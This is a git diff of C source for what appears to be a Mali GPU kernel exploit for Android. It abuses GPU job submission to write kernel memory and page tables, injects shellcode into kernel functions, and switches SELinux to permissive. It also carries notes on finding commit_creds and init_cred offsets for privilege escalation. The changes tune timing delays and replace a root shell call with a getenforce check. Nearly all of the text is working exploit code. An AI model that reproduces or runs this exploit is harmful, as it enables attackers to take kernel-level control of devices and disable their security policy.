diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c index c4f8b73..b43f631 100644 --- a/mali_shrinker_mmap32.c +++ b/mali_shrinker_mmap32.c @@ -76,8 +76,8 @@ Search: sel_read_enforce -> SELINUX_ENFORCING = ldr - KERNEL_BASE Need: ARM to HEX -ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED) ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED) +ADD_COMMIT = add x8, x8, #0x(Last 3 digits of COMMIT_CRED) */ /* @@ -181,8 +181,8 @@ static uint64_t selinux_enforcing; //static uint64_t avc_deny = 0x2CCC28; static uint64_t avc_deny; -static uint64_t selinux_enforcing_READ = 0X0; -static uint64_t selinux_enforcing_WRITE = 0X0; +static uint64_t selinux_enforcing_READ = 0x0; +static uint64_t selinux_enforcing_WRITE = 0x0; /* Overwriting SELinux to permissive strb wzr, [x0] @@ -634,7 +634,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { err(1, "submit job failed\n"); } - usleep(300000); + usleep(100000); } void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, uint64_t value, enum mali_write_value_type type) { @@ -651,7 +651,7 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u LOG("write_data overwrite addr : %llx %llx\n", overwrite_addr + data_offset, data_offset); curr_overwrite_addr = overwrite_addr; write_to(mali_fd, overwrite_addr + data_offset, value, atom_number++, type); - usleep(300000); + usleep(100000); } } } @@ -659,7 +659,7 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) { printf("write_func called with code_size = %llu\n", code_size); - usleep(300000); + usleep(100000); uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; uint64_t curr_overwrite_addr = 0; for (int i = 0; i < size; i++) { @@ -675,7 +675,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u for (int code = code_size - 1; code >= 0; code--) { write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); } - usleep(300000); + usleep(100000); } } } @@ -684,7 +684,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u int run_enforce() { char result = '2'; printf("run_enforce: before sleep\n"); - sleep(3); + sleep(2); printf("run_enforce: after sleep\n"); int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); printf("run_enforce: open\n"); @@ -712,7 +712,7 @@ int run_enforce_write() { int run_enforce_un() { char result = '2'; printf("run_enforce_un: before sleep\n"); - sleep(3); + sleep(2); printf("run_enforce_un: after sleep\n"); int enforce_fd = open("/sys/fs/selinux/deny_unknown", O_RDONLY); printf("run_enforce_un: open\n"); @@ -803,7 +803,7 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) uint64_t selinux_enforcing_addr = (((selinux_enforcing + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), selinux_enforcing_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); - usleep(300000); + usleep(100000); // Go through the reserve pages addresses to write to avc_denied with our own shellcode write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); } @@ -947,7 +947,7 @@ int main() { int flush_idx = 0; for (int i = 0; i < 10; i++) { if(!trigger(mali_fd, mali_fd2, &flush_idx)) { - system("sh"); + system("getenforce"); break; } }